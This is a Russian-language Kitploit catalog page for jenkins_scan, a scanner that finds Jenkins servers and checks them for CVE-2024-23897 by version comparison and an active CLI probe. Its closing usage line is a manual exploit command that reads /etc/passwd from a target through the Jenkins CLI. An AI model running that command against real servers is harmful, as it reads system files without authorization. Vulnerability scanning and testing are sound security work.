Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
jenkins_scan — Поиск окружения Jenkins и проверка на CVE-2024-23897 | Kitploit
Инструменты/GitHubGitHub/w41l3r/jenkins_scan
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubw41l3r/jenkins_scan

jenkins_scan

Поиск окружения Jenkins и проверка на CVE-2024-23897

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

jenkins_scan

Поиск окружения Jenkins и проверка CVE-2024-23897

Как это работает

Обнаружение Jenkins

Проверяет пути: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

Определяет с помощью:

  1. Header X-Jenkins — наиболее надежный, также возвращает версию
  2. Header X-Hudson — старые экземпляры
  3. Body HTML — строки, такие как «login to jenkins», «hudson.model» и т.д.
  4. /api/json — подтверждает по структуре JSON (_class, jobs, views)

Проверка CVE-2024-23897

Пассивная (по умолчанию): сравнивает обнаруженную версию с пороговыми значениями:

  • Weekly: < 2.442 → уязвим
  • LTS: < 2.426.3 → уязвим

Активная (--active): отправляет handshake бинарного протокола Jenkins CLI по HTTP. Если сервер отвечает 200 + Content-Type: application/octet-stream, это подтверждает, что канал CLI открыт и эксплойт применим.

Использование

Базовое сканирование

python jenkins_scan.py -f urls.txt

С активным probe + Burp в качестве прокси + вывод в файл

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20 потоков, подробный вывод, без цвета (для pipe/grep)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

Ручное подтверждение эксплойта на уязвимой цели

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

Скачать инструмент